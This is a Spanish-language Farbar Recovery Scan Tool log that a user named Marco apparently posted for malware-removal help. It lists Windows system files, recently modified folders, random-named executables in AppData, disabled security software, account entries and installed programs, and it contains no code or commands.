2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:02 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-03-25 14:27 - 2016-09-02 09:02 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-03-25 14:27 - 2016-09-02 09:01 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:57 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-03-25 14:27 - 2016-09-02 08:53 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 08:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-03-25 14:27 - 2016-09-02 08:49 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-03-25 14:27 - 2016-09-02 08:48 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 08:48 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 10:50 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-03-25 14:27 - 2016-06-06 09:23 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-03-25 14:27 - 2016-05-12 11:14 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2020-03-25 14:27 - 2016-05-12 09:18 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:17 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-03-25 14:27 - 2016-05-04 11:16 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-03-25 14:27 - 2016-05-04 08:55 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2020-03-25 14:27 - 2015-07-22 18:02 - 001390592 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-03-25 14:27 - 2015-07-22 18:02 - 000879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-03-25 14:27 - 2015-07-22 11:53 - 000635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2020-03-25 14:27 - 2015-07-22 10:48 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2020-03-25 14:26 - 2016-03-16 12:50 - 000156672 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000176128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2020-03-25 14:26 - 2016-03-16 12:28 - 000111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2020-03-25 14:26 - 2015-12-16 08:38 - 000419928 _____ C:\Windows\SysWOW64\locale.nls
2020-03-25 14:26 - 2015-12-16 08:37 - 000419928 _____ C:\Windows\system32\locale.nls
2020-03-25 14:26 - 2015-10-29 11:50 - 000342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2020-03-25 14:26 - 2015-10-29 11:50 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:50 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-03-25 14:26 - 2015-10-29 11:49 - 000020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2020-03-25 14:26 - 2015-05-25 12:19 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:18 - 000404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2020-03-25 14:26 - 2015-05-25 12:18 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2020-03-25 14:26 - 2015-05-25 12:01 - 000092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2020-03-25 14:26 - 2015-05-25 12:00 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2020-03-25 14:26 - 2015-05-25 12:00 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2020-03-25 14:25 - 2016-08-29 09:31 - 014183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2020-03-25 14:25 - 2016-08-29 09:31 - 001867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 012880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2020-03-25 14:25 - 2016-08-29 09:12 - 001499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2020-03-25 14:25 - 2016-08-29 09:04 - 003229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2020-03-25 14:25 - 2016-08-29 08:55 - 002972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2020-03-25 14:25 - 2016-07-07 09:36 - 001896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2020-03-25 14:25 - 2016-07-07 09:36 - 000287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-03-25 14:25 - 2016-07-07 09:08 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2020-03-25 14:25 - 2016-07-01 09:31 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:31 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-03-25 14:25 - 2016-07-01 09:13 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2020-03-25 14:25 - 2016-07-01 08:56 - 000464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-03-25 14:25 - 2016-03-09 13:00 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-03-25 14:25 - 2016-03-09 13:00 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000316416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2020-03-25 14:25 - 2016-01-20 18:51 - 000073664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2020-03-25 14:25 - 2015-12-16 12:55 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:47 - 000069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 001632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 001372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
2020-03-25 14:25 - 2015-04-10 21:19 - 000069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2020-03-25 14:06 - 2016-03-09 12:54 - 000275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2020-03-25 14:06 - 2016-03-09 12:34 - 000216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll


==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 14:29 - 2016-11-27 08:17 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\Mozilla
2020-03-26 14:24 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\DMCache
2020-03-26 13:53 - 2019-02-16 20:05 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (2)
2020-03-26 13:49 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-03-26 13:49 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-03-26 13:39 - 2012-11-11 17:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\CrashDumps
2020-03-26 12:18 - 2019-09-26 13:33 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-03-26 12:16 - 2009-07-13 23:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-03-26 11:34 - 2016-10-01 19:36 - 000002353 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2020-03-26 11:34 - 2013-05-07 17:40 - 000002232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-03-26 11:34 - 2010-06-19 21:50 - 000001413 _____ C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-03-25 23:01 - 2019-08-21 16:35 - 000910336 ___SH C:\Users\MARCO AVILA\Desktop\Thumbs.db
2020-03-25 22:19 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IDM
2020-03-25 22:08 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\inf
2020-03-25 21:55 - 2016-03-17 00:20 - 000000000 ____D C:\Program Files\TAP-Windows
2020-03-25 20:36 - 2019-01-21 16:36 - 000005670 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (2).txt
2020-03-25 19:17 - 2016-10-23 11:39 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\SquirrelTemp
2020-03-25 19:13 - 2010-07-11 15:44 - 002045382 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2020-03-25 19:13 - 2009-12-01 16:37 - 000903192 _____ C:\Windows\system32\perfh00A.dat
2020-03-25 19:13 - 2009-12-01 16:37 - 000214886 _____ C:\Windows\system32\perfc00A.dat
2020-03-25 19:13 - 2009-07-13 23:13 - 002121714 _____ C:\Windows\system32\PerfStringBackup.INI
2020-03-25 16:09 - 2018-11-06 18:43 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-03-25 15:43 - 2010-10-16 20:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\ElevatedDiagnostics
2020-03-25 15:20 - 2009-07-13 22:45 - 000592696 _____ C:\Windows\system32\FNTCACHE.DAT
2020-03-25 14:41 - 2009-10-28 12:41 - 000000000 ____D C:\Windows\ShellNew
2020-03-25 14:41 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-03-25 00:40 - 2010-06-19 21:49 - 000000000 ____D C:\Users\MARCO AVILA
2020-03-25 00:38 - 2019-07-18 13:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-03-25 00:38 - 2018-11-06 17:05 - 000000000 ____D C:\Users\Administrador.MAAH-PC
2020-03-25 00:38 - 2017-12-03 12:49 - 000000000 ____D C:\Program Files\CCleaner
2020-03-25 00:37 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\registration
2020-03-24 22:14 - 2011-12-31 01:46 - 000000000 ____D C:\Temp
2020-03-24 13:32 - 2019-08-06 10:58 - 000000000 ___HD C:\Users\MARCO AVILA\Desktop\_SNAPDOC
2020-03-22 02:21 - 2010-09-01 20:43 - 000024576 _____ C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-03-21 20:57 - 2017-10-19 11:28 - 000000000 _____ C:\end
2020-03-21 01:10 - 2019-03-24 22:24 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (3)
2020-03-20 17:21 - 2013-05-07 17:33 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-03-20 17:21 - 2013-05-07 17:33 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-03-20 02:22 - 2009-12-01 07:55 - 000000000 ____D C:\ProgramData\Temp
2020-03-13 20:41 - 2017-05-21 00:20 - 000000000 ____D C:\KMPlayer
2020-03-13 09:29 - 2013-01-30 15:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-03-12 13:02 - 2015-05-15 05:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-02-25 11:56 - 2009-07-13 23:08 - 000032518 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Archivos en la raíz de algunos directorios ========

2009-10-28 21:38 - 2009-02-10 13:23 - 000192484 _____ () C:\Program Files (x86)\Common Files\Acer GameZone online.ico
2011-09-12 13:38 - 2012-12-13 00:53 - 000000121 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Camdata.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamLayout.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamShapes.ini
2011-09-12 13:37 - 2012-12-13 00:52 - 000004416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamStudio.cfg
2010-08-29 00:04 - 2013-01-28 20:11 - 000000153 _____ () C:\Users\MARCO AVILA\AppData\Roaming\default.rss
2010-08-29 00:04 - 2010-08-29 00:04 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\downloads.m3u
2019-09-21 23:40 - 2019-09-21 23:47 - 000002459 _____ () C:\Users\MARCO AVILA\AppData\Roaming\droid4xinstaller.log
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço                                             ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2014-03-13 22:31 - 2014-03-13 22:31 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Roaming\history.Excel.pwcdat
2019-06-16 01:13 - 2019-06-16 01:36 - 000000556 _____ () C:\Users\MARCO AVILA\AppData\Roaming\koukou.ini
2015-06-03 21:12 - 2015-06-03 21:12 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\ProXoft
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2010-09-26 17:44 - 2010-09-26 17:44 - 000002355 _____ () C:\Users\MARCO AVILA\AppData\Roaming\SAS7_000.DAT
2015-11-15 20:33 - 2015-11-15 20:33 - 000001181 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt
2015-11-15 20:33 - 2015-11-15 20:33 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2012-01-11 00:27 - 2012-01-11 00:27 - 000037346 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Valores separados por comas (DOS).ADR
2017-12-03 12:59 - 2017-12-03 12:59 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\wklnhst.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ () C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ () C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ () C:\Users\MARCO AVILA\AppData\Local\Config.xml
2010-09-01 20:43 - 2020-03-22 02:21 - 000024576 _____ () C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-04-19 15:25 - 2013-04-19 15:25 - 000118823 _____ () C:\Users\MARCO AVILA\AppData\Local\debuggee.mdmp
2012-02-28 14:05 - 2012-02-28 14:05 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Local\fusioncache.dat
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ () C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ () C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ () C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ () C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2017-04-03 16:12 - 2017-04-03 16:12 - 000002594 _____ () C:\Users\MARCO AVILA\AppData\Local\recently-used.xbel
2010-12-05 00:07 - 2018-11-04 19:36 - 000007661 _____ () C:\Users\MARCO AVILA\AppData\Local\Resmon.ResmonCfg
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ () C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:34 - 2020-03-26 11:34 - 000032038 _____ () C:\Users\MARCO AVILA\AppData\Local\uninstall_temp.ico
2012-01-25 14:06 - 2012-01-25 14:06 - 000017408 _____ () C:\Users\MARCO AVILA\AppData\Local\WebpageIcons.db

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado correctamente

LastRegBack: 2020-03-19 13:04
==================== Final de FRST.txt ========================

Marco · 26 Marzo, 2020 21:09

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (26-03-2020 14:31:24)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-06-20 03:49:32)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1649130365-987012723-906343211-500 - Administrator - Disabled) => C:\Users\Administrador.MAAH-PC
ASPNET (S-1-5-21-1649130365-987012723-906343211-1015 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1649130365-987012723-906343211-1020 - Limited - Enabled)
Invitado (S-1-5-21-1649130365-987012723-906343211-501 - Limited - Disabled)
MARCO AVILA (S-1-5-21-1649130365-987012723-906343211-1000 - Administrator - Enabled) => C:\Users\MARCO AVILA

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

64 Bit HP CIO Components Installer (HKLM\...\{55D55008-E5F6-47D6-B16F-B2A40D4D145F}) (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems)
Acer Crystal Eye webcam Ver:1.1.124.1120 (HKLM-x32\...\{D0ACE89D-EC7F-470F-80BE-4C98ED366B32}) (Version: 1.1.124.1120 - Chicony Electronics Co.,Ltd.)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{8ed9688e-4f79-4308-91ca-f1c37ca142b4}_is1) (Version: 5.1.0.2 - Oberon Media, Inc.)
Acer GridVista (HKLM-x32\...\GridVista) (Version: 3.01.0730 - Acer Inc.)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 4.07.3008 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.02.3006 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0715 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3000 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.255 - Adobe)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Advanced Archive Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced Archive Password Recovery) (Version: 4.50 - ElcomSoft Co. Ltd.)
Advanced Office Password Recovery (HKLM-x32\...\{867A00F3-027A-4946-8CE2-F77FEBCD1BA8}) (Version: 5.2.498.423 - Elcomsoft Co. Ltd.)
Advanced PDF Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced PDF Password Recovery) (Version: 5.0 - ElcomSoft Co. Ltd.)
Advanced RAR Password Recovery (remove only) (HKLM-x32\...\Advanced RAR Password Recovery) (Version:  - )
Advanced RAR Repair v1.2 (HKLM-x32\...\Advanced RAR Repair v1.2) (Version:  - )
Advanced VBA Password Recovery PRO (HKLM-x32\...\Advanced VBA Password Recovery PRO) (Version:  - )
Advanced ZIP Password Recovery (remove only) (HKLM-x32\...\Advanced ZIP Password Recovery) (Version:  - )
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alice Greenfingers (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112920767}) (Version:  - Oberon Media)
Amazonia (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}) (Version:  - Oberon Media)
AndreaMosaic 3.33.0 (HKLM-x32\...\AndreaMosaic) (Version:  - )
Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Archivos auxiliares de instalación de Microsoft SQL Server 2008 (HKLM\...\{A639F412-1C05-4DCB-BF41-AD122A09E79C}) (Version: 10.2.4000.0 - Microsoft Corporation)
Ares 2.1.7 (HKLM-x32\...\Ares) (Version: 2.1.7-Build#3041 - Ares Development Group)
Ashampoo Burning Studio 8.02 (HKLM-x32\...\Ashampoo Burning Studio 8_is1) (Version: 8.0.2 - ashampoo GmbH & Co. KG)
